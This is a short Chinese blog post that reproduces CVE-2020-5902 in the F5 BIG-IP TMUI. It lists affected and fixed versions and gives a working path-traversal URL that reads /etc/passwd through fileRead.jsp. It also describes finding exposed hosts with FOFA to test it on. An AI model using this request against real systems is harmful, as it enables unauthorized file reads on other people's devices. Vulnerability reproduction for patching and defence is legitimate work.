F5 最新漏洞-CVE-2020-5902 BIG-IP RCE复现

认识F5

F5是一家国外安全厂商,国内比较有名的产品是负载均衡,产品名字也叫F5,各大银行及互联网金融行业可能用到了该厂商这款产品;产品主要是用来做链路负责和应用负载;相比国内的启明、绿盟的负载设备,F5负载设备个人认为是比较好用的,当然价格也不便宜,先来看一下设备登录页,至于里面的功能这里不做介绍。

F5 最新漏洞-CVE-2020-5902 BIG-IP RCE复现_第1张图片

了解完F5产品左右,我们来关注最新爆出来的安全漏洞

近期爆RCE漏洞是什么

------cve-2020-5902 BIG-IP RCE漏洞

简介

BIG-IP的TMUI存在RCE漏洞

影响范围

版本号主要如下
11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x

修复方法

升级
11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4

文件读取

https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

利用fofa搜索F5指纹信息,以搜出来IP:8443为列,读取系统passwd文件如下

F5 最新漏洞-CVE-2020-5902 BIG-IP RCE复现_第2张图片

 

参考链接:

https://www.cnblogs.com/potatsoSec/p/13253288.html

你可能感兴趣的:(CVE)